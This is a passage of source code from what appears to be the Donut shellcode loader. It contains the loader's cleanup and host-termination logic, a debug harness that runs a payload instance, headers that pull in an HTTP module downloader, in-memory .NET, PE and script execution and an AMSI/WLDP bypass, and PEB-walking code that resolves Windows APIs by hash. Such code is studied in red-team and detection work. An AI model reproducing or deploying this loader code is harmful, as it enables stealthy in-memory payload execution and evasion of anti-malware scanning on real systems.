343 Memset(inst->module.p, 0, (DWORD)inst->mod_len);
344
345 // free memory
346 rs = 0;
347 NtFreeVirtualMemory(NtCurrentProcess(), (PVOID)&inst->module.p, &rs, MEM_RELEASE, syscall_list);
348 inst->module.p = NULL;
349 }
350 }
351
352 // should we call RtlExitUserProcess?
353 term = (BOOL) (inst->exit_opt == DONUT_OPT_EXIT_PROCESS);
354
355 DPRINT("Erasing RW memory for instance");
356 Memset(inst, 0, inst->len);
357
358 DPRINT("Releasing RW memory for instance");
359 _VirtualFree((PVOID)(ULONG_PTR)inst->syscall_list, 0, MEM_DECOMMIT | MEM_RELEASE);
360 _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
361
362 if(term) {
363 DPRINT("Terminating host process");
364 // terminate host process
365 _RtlExitUserProcess(0);
366 }
367 DPRINT("Returning to caller");
368 // return to caller, which invokes RtlExitUserThread
369 return 0;
370 }
371
372 int ansi2unicode(PDONUT_INSTANCE inst, CHAR input[], WCHAR output[DONUT_MAX_NAME]) {
373 return inst->api.MultiByteToWideChar(CP_ACP, 0, input,
374 -1, output, DONUT_MAX_NAME);
375 }
376
377 #include "peb.c" // resolve functions in export table
378 #include "http_client.c" // Download module from HTTP server
379 //#include "dns_client.c" // Download module from DNS server
380 #include "inmem_dotnet.c" // .NET assemblies
381 #include "inmem_pe.c" // Unmanaged PE/DLL files
382 #include "inmem_script.c" // VBS/JS files
383
384 #include "bypass.c" // Bypass AMSI and WLDP
385 #include "getpc.c" // code stub to return program counter (always at the end!)
386
387 // the following code is *only* for development purposes
388 // given an instance file, it will run as if running on a target system
389 // attach a debugger to host process
390 #ifdef DEBUG
391
392 #include <stdio.h>
393 #include <string.h>
394 #include <stdlib.h>
395 #include <sys/stat.h>
396
397 int main(int argc, char *argv[]) {
398 FILE *fd;
399 struct stat fs;
400 PDONUT_INSTANCE inst;
401 DWORD old;
402 HANDLE h;
403
404 if(argc != 2) {
405 printf(" [ usage: loader <instance>\n");
406 return 0;
407 }
408 // get size of instance
409 if(stat(argv[1], &fs) != 0) {
410 printf(" [ unable to obtain size of instance.\n");
411 return 0;
412 }
413
414 // zero size?
415 if(fs.st_size == 0) {
416 printf(" [ invalid instance.\n");
417 return 0;
418 }
419
420 // try open for reading
421 fd = fopen(argv[1], "rb");
422 if(fd == NULL) {
423 printf(" [ unable to open %s.\n", argv[1]);
424 return 0;
425 }
426
427 // allocate memory
428 inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
429
430 if(inst != NULL) {
431 fread(inst, 1, fs.st_size, fd);
432
433 printf("Running...");
434
435 // run payload with instance
436 h = DonutLoader(inst);
437
438 if(h != (HANDLE)-1 && inst->oep != 0) {
439 printf("\nWaiting...");
440 WaitForSingleObject(h, INFINITE);
441 }
442 // deallocate
443 VirtualFree((LPVOID)(ULONG_PTR)inst->syscall_list, 0, MEM_DECOMMIT | MEM_RELEASE);
444 VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
445 }
446 fclose(fd);
447
448 system("pause");
449 return 0;
450 }
451 #endif
+164
-0
loader/loader.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef LOADER_H
32 #define LOADER_H
33
34 #if !defined(_MSC_VER)
35 #define __out_ecount_full(x)
36 #define __out_ecount_full_opt(x)
37 #include <inttypes.h>
38 #endif
39
40 #include <windows.h>
41 #include <wincrypt.h>
42 #include <oleauto.h>
43 #include <objbase.h>
44 #include <wininet.h>
45 #include <shlwapi.h>
46
47 #pragma comment(lib, "wininet.lib")
48 #pragma comment(lib, "advapi32.lib")
49 #pragma comment(lib, "crypt32.lib")
50 #pragma comment(lib, "ole32.lib")
51 #pragma comment(lib, "shlwapi.lib")
52 #pragma comment(lib, "shell32.lib")
53
54 #if defined(DEBUG)
55 #include <stdio.h>
56 #include <string.h>
57
58 #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
59
60 #define DPRINT(...) { \
61 fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
62 fprintf(stderr, __VA_ARGS__); \
63 }
64 #else
65 #define DPRINT(...) // Don't do anything in release builds
66 #endif
67
68 #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
69 (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
70 (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
71
72 // Relative Virtual Address to Virtual Address
73 #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
74
75 #ifndef NT_SUCCESS
76 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
77 #endif
78
79 #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
80
81 #ifndef FILE_OPEN
82 #define FILE_OPEN 0x00000001
83 #endif
84
85 #ifndef FILE_NON_DIRECTORY_FILE
86 #define FILE_NON_DIRECTORY_FILE 0x0000004
87 #endif
88
89 #if defined(_M_IX86) || defined(__i386__)
90 // return pointer to code in memory
91 char *get_pc(void);
92
93 // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
94 #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
95 #else
96 #define ADR(type, addr) (type)(addr) // do nothing on 64-bit
97 #endif
98
99 void *Memset(void *ptr, int value, unsigned int num);
100 void *Memcpy(void *destination, const void *source, unsigned int num);
101 int Memcmp(const void *ptr1, const void *ptr2, unsigned int num);
102 int _strcmp(const char *s1, const char *s2);
103 NTSTATUS RtlUserThreadStart(LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter);
104
105 #if !defined(_MSC_VER)
106 #define memcmp(x,y,z) Memcmp(x,y,z)
107 #endif
108
109 #include "depack.h"
110 #include "peb.h" // Process Environment Block
111 #include "winapi.h" // Prototypes
112 #include "clr.h" // Common Language Runtime Interface
113
114 #include "donut.h"
115
116 #include "amsi.h" // Anti-malware Scan Interface
117 #include "activescript.h" // Interfaces for executing VBS/JS files
118 #include "wscript.h" // Interfaces to support WScript object
119 #include "bypass.h" // Structs and function definitions for needed by bypasses
120 #include "syscalls.h" // Structs and function definitions for syscalls
121
122 typedef struct {
123 IActiveScriptSite site;
124 IActiveScriptSiteWindow siteWnd;
125 IHost wscript;
126 PDONUT_INSTANCE inst; //
127 } MyIActiveScriptSite;
128
129 // internal structure
130 typedef struct _DONUT_ASSEMBLY {
131 ICLRMetaHost *icmh;
132 ICLRRuntimeInfo *icri;
133 ICorRuntimeHost *icrh;
134 IUnknown *iu;
135 AppDomain *ad;
136 Assembly *as;
137 Type *type;
138 MethodInfo *mi;
139 } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
140
141 // Downloads a module from remote HTTP server into memory
142 BOOL DownloadFromHTTP(PDONUT_INSTANCE);
143
144 // .NET DLL/EXE
145 BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_MODULE, PDONUT_ASSEMBLY);
146 BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_MODULE, PDONUT_ASSEMBLY);
147 VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
148
149 // In-Memory execution of native DLL
150 VOID RunPE(PDONUT_INSTANCE, PDONUT_MODULE);
151
152 // VBS / JS files
153 VOID RunScript(PDONUT_INSTANCE, PDONUT_MODULE);
154
155 LPVOID xGetProcAddressByHash(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
156
157 LPVOID xGetProcAddressByHash(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV);
158
159 LPVOID xGetLibAddress(PDONUT_INSTANCE inst, PCHAR dll_name);
160
161 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, LPVOID base, PCHAR api_name, DWORD ordinal);
162
163 #endif
+1
-0
loader/order.txt less more
0 DonutLoader
+320
-0
loader/peb.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // find a DLL with a certain export, used by xGetProcAddress and FindExport
32 LPVOID FindReference(PDONUT_INSTANCE inst, LPVOID original_dll, PCHAR dll_name, PCHAR api_name) {
33 PPEB peb;
34 PPEB_LDR_DATA ldr;
35 PIMAGE_DOS_HEADER dos;
36 PIMAGE_NT_HEADERS nt;
37 PLDR_DATA_TABLE_ENTRY dte;
38 PIMAGE_DATA_DIRECTORY dir;
39 PIMAGE_EXPORT_DIRECTORY exp;
40 LPVOID addr = NULL, base;
41 DWORD rva, cnt;
42 PDWORD adr;
43 PDWORD sym;
44 PWORD ord;
45 PCHAR api;
46
47 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
48 ldr = (PPEB_LDR_DATA)peb->Ldr;
49
50 // for each DLL loaded
51 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
52 dte->DllBase != NULL && addr == NULL;
53 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
54 {
55 base = dte->DllBase;
56 // if this is the dll with the reference, continue
57 if (base == original_dll) continue;
58
59 addr = xGetProcAddress(inst, base, api_name, 0);
60 }
61 if (addr == NULL) {
62 // we did not find the reference, use GetProcAddress
63 HMODULE hModule = xGetLibAddress(inst, dll_name);
64
65 if(hModule != NULL) {
66 DPRINT("Calling GetProcAddress(%s)", api_name);
67 addr = inst->api.GetProcAddress(hModule, api_name);
68 } else addr = NULL;
69 }
70
71 return addr;
72 }
73
74 // search for an export in a DLL
75 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, LPVOID base, PCHAR api_name, DWORD ordinal) {
76 PIMAGE_DOS_HEADER dos;
77 PIMAGE_NT_HEADERS nt;
78 PIMAGE_DATA_DIRECTORY dir;
79 PIMAGE_EXPORT_DIRECTORY exp;
80 LPVOID addr = NULL;
81 DWORD rva, cnt;
82 PDWORD adr;
83 PDWORD sym;
84 PWORD ord;
85 PCHAR api;
86 CHAR dll_name[64];
87 CHAR new_api[64];
88 DWORD i;
89 PCHAR p;
90
91 if (base == NULL) return NULL;
92
93 dos = (PIMAGE_DOS_HEADER)base;
94 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
95 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
96 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
97
98 // if no export table, return NULL
99 if (rva==0) return NULL;
100
101 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
102 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
103 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
104 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
105
106 if (api_name != NULL) {
107 // exported by name
108 cnt = exp->NumberOfNames;
109 // if no api names, return NULL
110 if (cnt==0) return NULL;
111
112 do {
113 api = RVA2VA(PCHAR, base, sym[cnt-1]);
114 // check if the export name matches the API we are looking for
115 if (!_strcmp(api, api_name)) {
116 // get the address of the API
117 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
118 }
119 } while (--cnt && addr == NULL);
120 } else {
121 // exported by ordinal
122 addr = RVA2VA(PVOID, base, adr[ordinal - exp->Base]);
123 }
124
125 // is this a forward reference?
126 if ((PBYTE)addr >= (PBYTE)exp &&
127 (PBYTE)addr < (PBYTE)exp +
128 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
129 {
130 //DPRINT("%s is forwarded to %s", api_name, (char*)addr);
131
132 // copy DLL name to buffer
133 p=(char*)addr;
134
135 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
136 dll_name[i] = p[i];
137 if(p[i] == '.') break;
138 }
139
140 dll_name[i+1] = 'd';
141 dll_name[i+2] = 'l';
142 dll_name[i+3] = 'l';
143 dll_name[i+4] = 0;
144
145 p += i + 1;
146
147 // copy API name to buffer
148 for(i=0; p[i] != 0 && i < sizeof(new_api)-1;i++) {
149 new_api[i] = p[i];
150 }
151 new_api[i] = 0;
152
153 addr = FindReference(inst, base, dll_name, new_api);
154 }
155 return addr;
156 }
157
158 // find a DLL by name, load it if not found
159 LPVOID xGetLibAddress(PDONUT_INSTANCE inst, PCHAR search) {
160 PPEB peb;
161 PPEB_LDR_DATA ldr;
162 PIMAGE_DOS_HEADER dos;
163 PIMAGE_NT_HEADERS nt;
164 PLDR_DATA_TABLE_ENTRY dte;
165 PIMAGE_EXPORT_DIRECTORY exp;
166 LPVOID addr = NULL, base;
167 DWORD rva;
168 PCHAR name;
169 CHAR dll_name[64];
170 DWORD i;
171
172 for(i=0; search[i] != 0 && i < 64; i++) {
173 dll_name[i] = search[i];
174 }
175 dll_name[i] = 0;
176 // make sure the name ends with '.dll'
177 if (dll_name[i-4] != '.') {
178 dll_name[i++] = '.';
179 dll_name[i++] = 'd';
180 dll_name[i++] = 'l';
181 dll_name[i++] = 'l';
182 dll_name[i++] = 0;
183 }
184
185 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
186 ldr = (PPEB_LDR_DATA)peb->Ldr;
187
188 // for each DLL loaded
189 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
190 dte->DllBase != NULL && addr == NULL;
191 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
192 {
193 base = dte->DllBase;
194 dos = (PIMAGE_DOS_HEADER)base;
195 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
196 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
197 if (rva == 0) continue;
198
199 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
200 name = RVA2VA(PCHAR, base, exp->Name);
201
202 if (stricmp(dll_name, name)) {
203 addr = base;
204 }
205 }
206 // if the DLL was not found, load it
207 if (addr == NULL) {
208 addr = inst->api.LoadLibraryA(dll_name);
209 DPRINT("Loaded %s at 0x%p", dll_name, addr);
210 }
211 return addr;
212 }
213
214 // locate address of API in export table using Maru hash function
215 LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
216 PIMAGE_DOS_HEADER dos;
217 PIMAGE_NT_HEADERS nt;
218 DWORD i, j, cnt, rva;
219 PIMAGE_DATA_DIRECTORY dir;
220 PIMAGE_EXPORT_DIRECTORY exp;
221 PDWORD adr;
222 PDWORD sym;
223 PWORD ord;
224 PCHAR api, dll, p;
225 LPVOID addr=NULL;
226 ULONG64 dll_hash;
227 CHAR buf[MAX_PATH], dll_name[64], api_name[128];
228
229 dos = (PIMAGE_DOS_HEADER)base;
230 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
231 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
232 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
233
234 // if no export table, return NULL
235 if (rva==0) return NULL;
236
237 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
238 cnt = exp->NumberOfNames;
239
240 // if no api names, return NULL
241 if (cnt==0) return NULL;
242
243 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
244 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
245 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
246 dll = RVA2VA(PCHAR, base, exp->Name);
247
248 // get hash of DLL string converted to lowercase
249 for(i=0;dll[i]!=0;i++) {
250 buf[i] = dll[i] | 0x20;
251 }
252 buf[i] = 0;
253 dll_hash = maru(buf, iv);
254
255 do {
256 // calculate hash of api string
257 api = RVA2VA(PCHAR, base, sym[cnt-1]);
258 // xor with DLL hash and compare with hash to find
259 if ((maru(api, iv) ^ dll_hash) == api_hash) {
260 // return address of function
261 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
262
263 // is this a forward reference?
264 if ((PBYTE)addr >= (PBYTE)exp &&
265 (PBYTE)addr < (PBYTE)exp +
266 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
267 {
268 //DPRINT("%016llx is forwarded to %s", api_hash, (char*)addr);
269
270 // copy DLL name to buffer
271 p=(char*)addr;
272
273 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
274 dll_name[i] = p[i];
275 if(p[i] == '.') break;
276 }
277
278 dll_name[i+1] = 'd';
279 dll_name[i+2] = 'l';
280 dll_name[i+3] = 'l';
281 dll_name[i+4] = 0;
282
283 p += i + 1;
284
285 // copy API name to buffer
286 for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
287 api_name[i] = p[i];
288 }
289 api_name[i] = 0;
290
291 addr = FindReference(inst, base, dll_name, api_name);
292 }
293 return addr;
294 }
295 } while (--cnt && addr == NULL);
296
297 return addr;
298 }
299
300 // search all modules in the PEB for API
301 LPVOID xGetProcAddressByHash(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
302 PPEB peb;
303 PPEB_LDR_DATA ldr;
304 PLDR_DATA_TABLE_ENTRY dte;
305 LPVOID addr = NULL;
306
307 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
308 ldr = (PPEB_LDR_DATA)peb->Ldr;
309
310 // for each DLL loaded
311 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
312 dte->DllBase != NULL && addr == NULL;
313 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
314 {
315 // search the export table for api
316 addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
317 }
318 return addr;
319 }
+366
-0
loader/peb.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PEB_H
32 #define PEB_H
33
34 #include <windows.h>
35
36 typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
37
38 typedef struct _LSA_UNICODE_STRING {
39 USHORT Length;
40 USHORT MaximumLength;
41 PWSTR Buffer;
42 } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
43
44 typedef struct _STRING {
45 USHORT Length;
46 USHORT MaximumLength;
47 PCHAR Buffer;
48 } STRING, *PSTRING, ANSI_STRING, *PANSI_STRING;
49
50 typedef struct _RTL_USER_PROCESS_PARAMETERS {
51 BYTE Reserved1[16];
52 PVOID Reserved2[10];
53 UNICODE_STRING ImagePathName;
54 UNICODE_STRING CommandLine;
55 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
56
57 // PEB defined by rewolf
58 // http://blog.rewolf.pl/blog/?p=573
59 typedef struct _PEB_LDR_DATA {
60 ULONG Length;
61 BOOL Initialized;
62 LPVOID SsHandle;
63 LIST_ENTRY InLoadOrderModuleList;
64 LIST_ENTRY InMemoryOrderModuleList;
65 LIST_ENTRY InInitializationOrderModuleList;
66 } PEB_LDR_DATA, *PPEB_LDR_DATA;
67
68 typedef struct _LDR_DATA_TABLE_ENTRY
69 {
70 LIST_ENTRY InLoadOrderLinks;
71 LIST_ENTRY InMemoryOrderLinks;
72 LIST_ENTRY InInitializationOrderLinks;
73 LPVOID DllBase;
74 LPVOID EntryPoint;
75 ULONG SizeOfImage;
76 UNICODE_STRING FullDllName;
77 UNICODE_STRING BaseDllName;
78 } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
79
80 typedef struct _PEB {
81 BYTE InheritedAddressSpace;
82 BYTE ReadImageFileExecOptions;
83 BYTE BeingDebugged;
84 BYTE _SYSTEM_DEPENDENT_01;
85
86 LPVOID Mutant;
87 LPVOID ImageBaseAddress;
88
89 PPEB_LDR_DATA Ldr;
90 PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
91 LPVOID SubSystemData;
92 LPVOID ProcessHeap;
93 LPVOID FastPebLock;
94 LPVOID _SYSTEM_DEPENDENT_02;
95 LPVOID _SYSTEM_DEPENDENT_03;
96 LPVOID _SYSTEM_DEPENDENT_04;
97 union {
98 LPVOID KernelCallbackTable;
99 LPVOID UserSharedInfoPtr;
100 };
101 DWORD SystemReserved;
102 DWORD _SYSTEM_DEPENDENT_05;
103 LPVOID _SYSTEM_DEPENDENT_06;
104 LPVOID TlsExpansionCounter;
105 LPVOID TlsBitmap;
106 DWORD TlsBitmapBits[2];
107 LPVOID ReadOnlySharedMemoryBase;
108 LPVOID _SYSTEM_DEPENDENT_07;
109 LPVOID ReadOnlyStaticServerData;
110 LPVOID AnsiCodePageData;
111 LPVOID OemCodePageData;
112 LPVOID UnicodeCaseTableData;
113 DWORD NumberOfProcessors;
114 union
115 {
116 DWORD NtGlobalFlag;
117 LPVOID dummy02;
118 };
119 LARGE_INTEGER CriticalSectionTimeout;
120 LPVOID HeapSegmentReserve;
121 LPVOID HeapSegmentCommit;
122 LPVOID HeapDeCommitTotalFreeThreshold;
123 LPVOID HeapDeCommitFreeBlockThreshold;
124 DWORD NumberOfHeaps;
125 DWORD MaximumNumberOfHeaps;
126 LPVOID ProcessHeaps;
127 LPVOID GdiSharedHandleTable;
128 LPVOID ProcessStarterHelper;
129 LPVOID GdiDCAttributeList;
130 LPVOID LoaderLock;
131 DWORD OSMajorVersion;
132 DWORD OSMinorVersion;
133 WORD OSBuildNumber;
134 WORD OSCSDVersion;
135 DWORD OSPlatformId;
136 DWORD ImageSubsystem;
137 DWORD ImageSubsystemMajorVersion;
138 LPVOID ImageSubsystemMinorVersion;
139 union
140 {
141 LPVOID ImageProcessAffinityMask;
142 LPVOID ActiveProcessAffinityMask;
143 };
144 #ifdef _WIN64
145 LPVOID GdiHandleBuffer[64];
146 #else
147 LPVOID GdiHandleBuffer[32];
148 #endif
149 LPVOID PostProcessInitRoutine;
150 LPVOID TlsExpansionBitmap;
151 DWORD TlsExpansionBitmapBits[32];
152 LPVOID SessionId;
153 ULARGE_INTEGER AppCompatFlags;
154 ULARGE_INTEGER AppCompatFlagsUser;
155 LPVOID pShimData;
156 LPVOID AppCompatInfo;
157 PUNICODE_STRING CSDVersion;
158 LPVOID ActivationContextData;
159 LPVOID ProcessAssemblyStorageMap;
160 LPVOID SystemDefaultActivationContextData;
161 LPVOID SystemAssemblyStorageMap;
162 LPVOID MinimumStackCommit;
163 } PEB, *PPEB;
164
165
166 typedef struct _CLIENT_ID {
167 HANDLE UniqueProcess;
168 HANDLE UniqueThread;
169 } CLIENT_ID, *PCLIENT_ID;
170
171 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
172 typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
173 typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
174 typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
175
176 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
177 PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
178 PACTIVATION_CONTEXT *ActivationContext;
179 ULONG Flags;
180 } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
181
182 typedef struct _ACTIVATION_CONTEXT_STACK
183 {
184 PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
185 LIST_ENTRY FrameListCache;
186 ULONG Flags;
187 ULONG NextCookieSequenceNumber;
188 ULONG StackId;
189 } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
190 #define GDI_BATCH_BUFFER_SIZE 310
191
192 typedef struct _GDI_TEB_BATCH
193 {
194 ULONG Offset;
195 ULONG_PTR HDC;
196 ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
197 } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
198
199 typedef struct _TEB_ACTIVE_FRAME_CONTEXT
200 {
201 ULONG Flags;
202 PSTR FrameName;
203 } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
204
205 typedef struct _TEB_ACTIVE_FRAME
206 {
207 ULONG Flags;
208 struct _TEB_ACTIVE_FRAME *Previous;
209 PTEB_ACTIVE_FRAME_CONTEXT Context;
210 } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
211
212 #if !defined(_MSC_VER) && !defined(_WINNT_)
213 typedef struct _PROCESSOR_NUMBER {
214 USHORT Group;
215 UCHAR Number;
216 UCHAR Reserved;
217 } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
218 #endif
219
220 typedef struct _TEB
221 {
222 NT_TIB NtTib;
223
224 PVOID EnvironmentPointer;
225 CLIENT_ID ClientId;
226 PVOID ActiveRpcHandle;
227 PVOID ThreadLocalStoragePointer;
228 PPEB ProcessEnvironmentBlock;
229
230 ULONG LastErrorValue;
